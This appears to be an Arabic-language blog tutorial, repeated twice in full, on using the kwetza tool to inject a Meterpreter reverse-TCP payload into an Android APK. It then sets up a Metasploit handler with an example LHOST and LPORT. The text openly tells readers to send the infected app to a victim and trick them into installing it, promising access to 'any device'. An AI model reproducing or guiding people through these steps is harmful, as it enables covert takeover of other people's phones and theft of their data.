السلام عليكم ورحمه الله وبركاته معكم الجنرال عمر في شرح جديد وهو ازاي تدمج بايلود في التطبيقات واخترق اي جهاز
اقدم لكم اداة kwetza وتستخدم لدمج باليود ملغم بتطبيقات الاندرويد APK
تثبيت أداة kwetza
اولا نثبت الامر التالي
$ pip install beautifulsoup4
بعد ذلك نقوم بتنزيل الاداه
$ git clone https://github.com/sensepost/kwetza.git
طريقة إستخدام kwetza
$ python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
nameOfTheApkToInfect.apk
الملف الذي تريد عمل حقن له (تطبيق ألعاب...)
مثال :
$ python kwetza.py testhack.apk 192.168.1.1 4444 yes
يتم حفظ الملف الجديد في المسار التالي، وهو بنفس إسم الملف الأصلي قبل الحقن.
kwetza/testhack/dist/testhack.apk
بعد حقن التطبيق وارساله للضحيه وبطريقتك تخدع الضحيه لتثبيت التطبيق
نفتح اداة الميتاسبلويت
بعد الدخول علي اداه MetaSploit ندخل الاوامر التاليه بالترتيب حسب الهوست والبورت الي انت حقنت فيه التطبيق
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost 192.168.1.1
$ set lport 4444
$ exploit
$ help
وبكذا انتهينا من الشرح موفقين جميعا والى شروحات قادمه
كان معكم الجنرال عمر في دورة برنامج ترميكس
#الجنرال_للمعلوميات_تك
اقدم لكم اداة kwetza وتستخدم لدمج باليود ملغم بتطبيقات الاندرويد APK
تثبيت أداة kwetza
اولا نثبت الامر التالي
$ pip install beautifulsoup4
بعد ذلك نقوم بتنزيل الاداه
$ git clone https://github.com/sensepost/kwetza.git
طريقة إستخدام kwetza
$ python kwetza.py nameOfTheApkToInfect.apk LHOST LPORT yes/no
nameOfTheApkToInfect.apk
الملف الذي تريد عمل حقن له (تطبيق ألعاب...)
مثال :
$ python kwetza.py testhack.apk 192.168.1.1 4444 yes
يتم حفظ الملف الجديد في المسار التالي، وهو بنفس إسم الملف الأصلي قبل الحقن.
kwetza/testhack/dist/testhack.apk
بعد حقن التطبيق وارساله للضحيه وبطريقتك تخدع الضحيه لتثبيت التطبيق
نفتح اداة الميتاسبلويت
بعد الدخول علي اداه MetaSploit ندخل الاوامر التاليه بالترتيب حسب الهوست والبورت الي انت حقنت فيه التطبيق
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost 192.168.1.1
$ set lport 4444
$ exploit
$ help
وبكذا انتهينا من الشرح موفقين جميعا والى شروحات قادمه
كان معكم الجنرال عمر في دورة برنامج ترميكس
#الجنرال_للمعلوميات_تك
م/عمر محمد السويفي
عمر السويفي : من مصر مهندس برمجيات ومستشار لمكافحة الارهاب والجرائم الالكترونية وعضو المنظمة العربية الدولية للتحكيم الدولي وفض المنازعات بين الدول , مبرمج تطبيقات الويب , مدرب علوم الحاسب